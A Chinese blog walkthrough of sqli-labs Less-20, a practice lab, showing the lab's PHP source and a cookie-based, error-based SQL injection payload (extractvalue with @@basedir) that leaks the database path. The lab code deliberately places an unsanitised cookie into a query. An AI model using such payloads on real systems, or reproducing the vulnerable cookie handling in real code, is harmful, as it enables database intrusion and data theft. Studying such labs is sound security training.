sqli-labs————less 20

Less-20

sqli-labs————less 20_第1张图片这里做一个简单的测试:

username:admin

password:aaa

sqli-labs————less 20_第2张图片

从上面的显示结果中,我们看到了user-agent、COOKIE的内容,我们这里查看一下源代码看看,到底是怎么回事:





Less-20 Cookie Injection- Error Based- string


 Welcome    Dhakkan 
"; echo "
"; echo "
"; echo ""; echo '
'; echo '
Username :    '; echo '
'; echo '
Password :      '; echo '

'; echo '
'; echo '
'; echo '
'; echo '
'; echo '
'; echo ''; echo '



'; echo ''; echo '
'; function check_input($value) { if(!empty($value)) { $value = substr($value,0,20); // truncation (see comments) } if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled { $value = stripslashes($value); } if (!ctype_digit($value)) // Quote if not a number { $value = "'" . mysql_real_escape_string($value) . "'"; } else { $value = intval($value); } return $value; } echo "
"; echo "
"; if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1); $cookee = $row1['username']; if($row1) { echo ''; setcookie('uname', $cookee, time()+3600); header ('Location: index.php'); echo "I LOVE YOU COOKIES"; echo ""; echo ''; //echo 'Your Cookie is: ' .$cookee; echo ""; echo "
"; print_r(mysql_error()); echo "

"; echo ''; echo "
"; } else { echo ''; //echo "Try again looser"; print_r(mysql_error()); echo "
"; echo "
"; echo ''; echo "
"; } } echo "
"; echo ''; echo '
'; } else { if(!isset($_POST['submit'])) { $cookee = $_COOKIE['uname']; $format = 'D d M Y - H:i:s'; $timestamp = time() + 3600; echo "
"; echo '


'; echo ''; echo "

"; echo '
'; echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT']; echo "
"; echo ''; echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR']; echo "
"; echo ''; echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE
"; echo ''; echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp); echo "
"; $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1"; $result=mysql_query($sql); if (!$result) { die('Issue with your mysql: ' . mysql_error()); } $row = mysql_fetch_array($result); if($row) { echo ''; echo 'Your Login name:'. $row['username']; echo "
"; echo ''; echo 'Your Password:' .$row['password']; echo "
"; echo "
"; echo 'Your ID:' .$row['id']; } else { echo "
"; echo '


'; echo ''; echo "

"; //echo ''; } echo '
'; echo '
'; echo ''; echo '
'; echo '
'; } else { echo '
'; echo "
"; echo "
"; echo "
"; echo "
"; echo "
"; echo "
"; echo ''; echo " Your Cookie is deleted"; setcookie('uname', $row1['username'], time()-3600); header ('Location: index.php'); echo '

'; } echo "
"; echo "
"; //header ('Location: main.php'); echo "
"; echo "
"; //echo '
'; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'Cookie:'.$cookee."\n"); fclose($fp); } ?>
从源代码中我们可以看到COOKIE从username中获得值后,当再次刷新时,会从COOKIE中读取username,然后进行查询。

登录成功之后,我们可以修改cookie,当再次刷新的时候,这时候sql语句就会被修改,我们使用tamper data进行演示:

cookie:

uname=admin1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#

sqli-labs————less 20_第3张图片

从上面的截图中我们可以看到爆出了mysql的路径。

你可能感兴趣的:(【信息安全】,【渗透测试实战1】,———Sqli-labs实战)